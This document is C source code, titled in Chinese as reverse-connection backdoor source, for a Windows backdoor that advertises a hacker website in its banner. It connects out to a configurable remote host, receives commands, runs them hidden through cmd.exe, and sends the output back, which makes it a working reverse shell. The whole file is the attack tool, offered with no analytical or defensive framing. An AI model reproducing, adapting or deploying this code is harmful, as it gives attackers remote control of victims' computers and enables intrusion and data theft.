反向连接后门源码

#include < winsock2.h >
#include < stdio.h >

#pragma  comment(lib,"ws2_32.lib")

void  main( int  argc, char   ** argv)
{
char   * messages  =   " ======================== BackConnect BackDoor V0.1 ======================== ========= Welcome to Http://www.hackerxfiles.net ========= " ; 
WSADATA WSAData;
SOCKET sock;
SOCKADDR_IN addr_in;
char  buf1[ 1024 ];    // 作为socket接收数据的缓冲区
memset(buf1, 0 , 1024 );    // 清空缓冲区
 
if  (WSAStartup(MAKEWORD( 2 , 0 ), & WSAData) != 0 )
   {
     printf( " WSAStartup error.Error:d " ,WSAGetLastError());
      return ;
   }

   addr_in.sin_family = AF_INET;
   addr_in.sin_port = htons( 80 );   // 反向连接的远端主机端口
   addr_in.sin_addr.S_un.S_addr = inet_addr( " 127.0.0.1 " );   // 远端IP
   
    if  ((sock = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP)) == INVALID_SOCKET)
   {
     printf( " Socket failed.Error:d " ,WSAGetLastError());
      return ;
   }
    if (WSAConnect(sock,( struct  sockaddr  * ) & addr_in, sizeof (addr_in),NULL,NULL,NULL,NULL) == SOCKET_ERROR)      // 连接客户主机
   {
     printf( " Connect failed.Error:d " ,WSAGetLastError());
      return ;
   }
   
    if  (send(sock,messages,strlen(messages), 0 ) == SOCKET_ERROR)   // 发送欢迎信息
   {
        printf( " Send failed.Error:d " ,WSAGetLastError());
         return ;
   }
   
char  buffer[ 2048 ]  =  { 0 }; // 管道输出的数据

for ( char  cmdline[ 270 ];;memset(cmdline, 0 , sizeof (cmdline))){
SECURITY_ATTRIBUTES sa; // 创建匿名管道用于取得cmd的命令输出
HANDLE hRead,hWrite;
sa.nLength  =   sizeof (SECURITY_ATTRIBUTES);
sa.lpSecurityDescriptor  =  NULL;
sa.bInheritHandle  =  TRUE;
if  ( ! CreatePipe( & hRead, & hWrite, & sa, 0 )) 
{
  printf( " Error On CreatePipe() " );
      return ;
} 

STARTUPINFO si;
PROCESS_INFORMATION pi; 
si.cb  =   sizeof (STARTUPINFO);
GetStartupInfo( & si); 
si.hStdError  =  hWrite;
si.hStdOutput  =  hWrite;
si.wShowWindow  =  SW_HIDE;
si.dwFlags  =  STARTF_USESHOWWINDOW  |  STARTF_USESTDHANDLES;

GetSystemDirectory(cmdline,MAX_PATH + 1 );
strcat(cmdline, " \cmd.exe /c " );

int    len = recv(sock,buf1, 1024 ,NULL);
if (len == SOCKET_ERROR)exit( 0 );  // 如果客户端断开连接，则自动退出程序
if (len <= 1 ){send(sock, " error " , sizeof ( " error " ), 0 ); continue ;}


strncat(cmdline,buf1,strlen(buf1));  // 把命令参数复制到cmdline
if  ( ! CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL, & si, & pi)) 
{
 send(sock, " Error command " , sizeof ( " Error command " ), 0 );
  continue ;
}
  
CloseHandle(hWrite);
// 循环读取管道中数据并发送，直到管道中没有数据为止
for (DWORD bytesRead;ReadFile(hRead,buffer, 2048 , & bytesRead,NULL);memset(buffer, 0 , 2048 )){  
send(sock,buffer,strlen(buffer), 0 );
}
      }

}